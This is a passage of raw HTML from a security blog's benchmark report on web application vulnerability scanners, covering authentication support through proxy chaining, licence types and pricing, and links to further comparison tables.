&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-IwGUBPxxl3zYHPb7ik1rx67OlaztSZ4qQCr3D8vP7-PmJ947GdZ1-WuI6OzPKN82dZuCSzbhaLTAQxT7E1Z_642MBjqQ56Qq-z432up95V5oJcEm6CjC-CU0GK8UydK_ZERNaVIsOdc/s1600/%252830%2529+Test10-+Unified-+Coverage+Feature+Count.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-IwGUBPxxl3zYHPb7ik1rx67OlaztSZ4qQCr3D8vP7-PmJ947GdZ1-WuI6OzPKN82dZuCSzbhaLTAQxT7E1Z_642MBjqQ56Qq-z432up95V5oJcEm6CjC-CU0GK8UydK_ZERNaVIsOdc/s1600/%252830%2529+Test10-+Unified-+Coverage+Feature+Count.png&quot; height=&quot;556&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;18. Test XI - Authentication/Usability&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Although supporting the authentication method required by
the application seems like a crucial quality (&lt;b&gt;and certainly is a convenient
feature&lt;/b&gt;), in reality, certain scanner proxy chaining features can make-up
for the lack of support in most of the authentication methods, by employing the
use of a 3rd party proxy to authenticate on the scanner&#39;s behalf.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;For example, if we wanted to use a scanner that does not
support NTLM authentication (but does support an upstream proxy), we could have
defined the relevant credentials in Burpsuite FE, and define it as an upstream
proxy for the scanner we intend to use.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;However, chaining the scanner to an external tool that
supports the authentication still has some disadvantages, some of them major, such
as &lt;b&gt;reduced performance&lt;/b&gt;,&lt;b&gt; potential stability issues&lt;/b&gt;, &lt;b&gt;thread
limitation&lt;/b&gt; and general inconvenience.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The following comparison table shows which authentication
methods and features are supported by the various assessed scanners:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/authentication-features-comparison-unified-list.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://sectoolmarket.com/authentication-features-comparison-unified-list.html&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;19. Test XII - Results/Features vs. Pricing&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;The following assessment is in fact a summary of the
important results, in comparison to the product price and features.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 16.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;This section will probably be the most useful section for
anyone looking to purchase a commercial or SAAS solution, or is debating
whether or not to use open source products instead.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;As I mentioned in the introduction, since web application
scanners might actually be a &lt;b&gt;bundle&lt;/b&gt; of several &lt;b&gt;semi-independent
products&lt;/b&gt; (generic vulnerability scanner, known vulnerability scanner,
infection scanner, etc), it&#39;s very &lt;b&gt;important&lt;/b&gt; to notice which modules are
included in each offer, especially in relation to commercial scanner &lt;b&gt;pricing&lt;/b&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WAVSEP currently focuses on assessing the &lt;b&gt;generic
vulnerability scanning module&lt;/b&gt; of web application scanners, and whatever it
is you&#39;re paying might be relative to the &lt;b&gt;rest of the modules&lt;/b&gt; the
product contains (or does not contain), in case you actually need those.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In short, the scanner price might (or might not) reflect a
set of products that could probably have been priced separately as independent
products. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;For your convenience, I invested some effort in mapping which
of these products contain additional modules, although some classification of
modules might still be missing.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The mapped modules include &lt;b&gt;&lt;i&gt;generic&lt;/i&gt;&lt;/b&gt;&lt;i&gt; &lt;b&gt;web-app
scanning modules&lt;/b&gt;&lt;/i&gt;, &lt;b&gt;&lt;i&gt;generic web service scanning modules&lt;/i&gt;&lt;/b&gt;, &lt;b&gt;&lt;i&gt;flash
application scanning modules&lt;/i&gt;&lt;/b&gt; and &lt;b&gt;&lt;i&gt;CGI scanning modules&lt;/i&gt;&lt;/b&gt;
(a.k.a web server scanning modules or known vulnerability scanning modules).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The mapped categories &lt;b&gt;don&#39;t&lt;/b&gt; &lt;b&gt;yet&lt;/b&gt; include &lt;b&gt;SAST&lt;/b&gt;
and &lt;b&gt;IAST&lt;/b&gt; scanning modules, Applet/Silverlight scanning modules, website
infection scanning modules and additional categories which may be mapped in the
future.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Another important issue to pay attention to is the &lt;b&gt;type&lt;/b&gt;
of &lt;b&gt;license&lt;/b&gt; acquired. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In general, I did not cover &lt;b&gt;non commercial&lt;/b&gt; prices in
this comparison, and in addition, did not include any vendor specific bundles, sales,
discounts and sales pitches.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;I presented the base prices listed in the vendor website or
provided to me by the vendors, according to a total of 6 predefined categories,
which are in fact, combinations of the following concepts:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Consultant Licenses:&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
although there isn&#39;t a commonly accepted term, I defined &quot;Consultant&quot;
licenses as licenses that fit the common requirements of a consulting firm -
scanning an unrestricted amount of IP addresses, without any boundaries or
limitations.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Limited Enterprise Licenses:&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; Any license that allowed scanning an unlimited but
restricted set of addresses (for example - internal network addresses or
organization-specific assets) was defined as an enterprise license, which might
not be suited for a consultant, but will usually suffice for an organization
interested in assessing its own applications.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Website/Year&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
- a license to install the software on a single station and use it for one year
against a single IP address (the exception to this rule is Netsparker, in which
the price per website reflects 3 Websites).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Seat/Year&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
- a license to install the software on a single station and use it for a single
year.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Perpetual Licenses&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
- pay once, and it&#39;s yours (might still be limited by seat, website, enterprise
or consultant restrictions). The vendor&#39;s website usually includes additional
prices for optional support and product updates.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The various prices can be viewed in the dedicated comparison
in sectoolmarket, available in the following address:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;It is important to remember that these prices might change,
vary or be affected by numerous variables, from special discounts and sales to
a strategic conscious decision of vendors to invest in you as a customer or as
a beta testing site.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;20. Additional Comparisons&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The following section contains additional information on the
tested tools that was documented throughout the research, and may be of use to
the reader.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;List of Tools&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The list of tools tested in this benchmark, and in the
previous benchmarks, can be accessed through the following link:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://sectoolmarket.com/list-of-tested-web-application-scanners-unified-list.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;List of Tested Scanners and Their Licenses, Notes, Vendor,
Source Repository and Latest Update&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Additional Features&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Complementary scan features that were not evaluated or
included in the benchmark:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://sectoolmarket.com/complimentary-features-comparison-unified-list.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Complementary Scan Features&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://sectoolmarket.com/general-features-comparison-unified-list.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;General Scanner Features&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 3.75pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 3.75pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In
order to clarify what each column in the report table means, use the following
